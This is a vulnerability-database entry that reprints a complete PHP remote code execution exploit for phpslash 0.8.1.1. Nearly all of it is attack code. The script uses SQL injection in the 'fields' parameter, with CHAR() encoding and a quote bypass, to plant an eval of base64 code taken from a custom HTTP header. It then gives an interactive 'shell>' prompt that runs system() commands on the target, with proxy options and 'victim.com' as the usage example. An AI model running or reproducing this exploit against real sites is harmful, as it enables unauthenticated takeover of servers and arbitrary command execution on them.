phpslash <= 0.8.1.1 Remote Code Execution Exploit

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052219 漏洞类型
发布时间 2009-02-05 更新时间 2009-02-05
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009020012
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 #!/usr/bin/php -q
<?php
#
# This file requires the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
##################################################
#
# phpslash <= 0.8.1.1 Remote Code Execution Exploit
# - - - - - - - - - - - - - - - - - - - - - - - - - 
# RCE with no special rights (guest).
# No special PHP conditions required.
# - - - - - - - - - - - - - - - - - - - - - - - - - 
# #0 It was a private sploit, but I decided to publish
# it #1 You did the fag on that one bro, it will not happen
# again =). #2 Don't try to use it on hzv, I helped them
# to patch this one before I publish it =)
# - - - - - - - - - - - - - - - - - - - - - - - - - 
# Exploitation steps:
# 1 - include/class/tz_functions.inc tz_strftime()
# 2 - include/class/tz_functions.inc tz_generic()
# 3 - include/tz_env.class           generic()
#
error_reporting( E_ALL ^ E_NOTICE );
require('phpsploitclass.php');

// Main function
function main()
{
        // :)
        $web = new phpsploit();
        $web->agent( 'Mozilla Firefox' );

        // Hey ya :)
        head();

        // Target
        $url = get_p( 'url', true );
        
        // Proxy options
        $prh = get_p( 'proxhost' );
        $pra = get_p( 'proxauth' );

        // Use a proxy ?
        if( $prh )
        {
                // host:ip
                $web->proxy( $prh );
                
                // Authentication
                if( $pra )
                $web->proxyauth( $pra );
        }
        
        // Single quote bypass
        $byp = "1');";

        // PHP code
        $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';

        // Separator
        $s_sep = md5( rand( 0, 1000000000 ) . 'HEY_YA' );
        $c_sep = "print('$s_sep');";

        // Final PHP code
        $final = $byp . $c_sep  . $php . $c_sep  . 'exit();//';

        // Welcome guess !
        while( ($cmd = cmd_prompt()) !== false )
        {
                // magic_quotes_gpc bypass
                $web->addheader( 'MypCode', base64_encode( 'system("' . add_slashes($cmd) . '");' ) );
        
                // Go =]
                $web->get( $url . 'index.php?fields=' . to_char( $final ) . ',1' );

                // Result
                $res = explode( $s_sep, $web->getcontent() );

                // Erf 
                if( !isset( $res[1] ) )
                {
                        print "\nFailed";
                        exit(1);
                }
                // Cool
                else
                {
                        if( empty( $res[1] ) )
                        print "\nNo output: system() disabled OR cmd failed OR cmd without output";
                        
                        else
                        print "\n" . $res[1];
                }
        }
        
        return;
}

// No more bug with " and $
function add_slashes( $str )
{
        return str_replace( '$', '\\$', addslashes( $str ) );
}

// Command prompt
function cmd_prompt()
{
        print "\nshell>";

        $cmd = trim( fgets( STDIN ) );
        
        // Wanna stop =( ?
        if( in_array( strtolower( $cmd ) , array( 'exit', 'quit' ) ) )
        return false;
        
        else 
        return $cmd;
}

// MySQL CHAR() encoding
function to_char( $data )
{
        $chars = 'CHAR(';
        $len   = strlen( $data );
        
        for( $i = 0; $i < $len; $i++ )
        {
                $chars .= ord( $data[ $i ] );
                
                if( $i != $len-1 )
                $chars .= ',';
        }
        
        return $chars . ')';
}

// CLI params
function get_p( $p, $exit = false )
{
        foreach( $_SERVER['argv'] as $key => $value )
        {
                if( $value === '-' . $p )
                {
                        if( isset( $_SERVER['argv'][ $key+1 ] ) &&
                           !empty( $_SERVER['argv'][ $key+1 ] ) )
                        {					
                                return $_SERVER['argv'][ $key+1 ];
                        }
                        else
                        {
                                if( $exit )
                                usage();
                                        
                                return true;
                        }
                }
        }
                
        if( $exit )
        usage();
                
        return false;
}
        
// Headers =)
function head()
{
        print "\nphpslash <= 0.8.1.1 Remote Code Execution Exploit\n";
        print "-------------------------------------------------\n\n";
        print " About: \n";
        print "  by DarkFig  < gmdarkfig (at) gmail (dot) com >\n";
        print "  http://acid-root.new.fr/\n";
        print "  #acidroot_at_irc&#46;worldnet.net\n\n";
        
        return;
}

// Usage, can help..
function usage()
{
        print " Usage:\n";
        print "  php spl.php -url <website> [options]\n\n";
        print " Example:\n";
        print "  php spl.php -url http://victim.com/\n\n";
        print " Options:\n";
        print "  -proxhost <ip:port> if you wanna use a proxy\n";
        print "  -proxauth <usr:pwd> proxy with authentication\n";
        
        exit(0);
}

// Run baby
main();

?>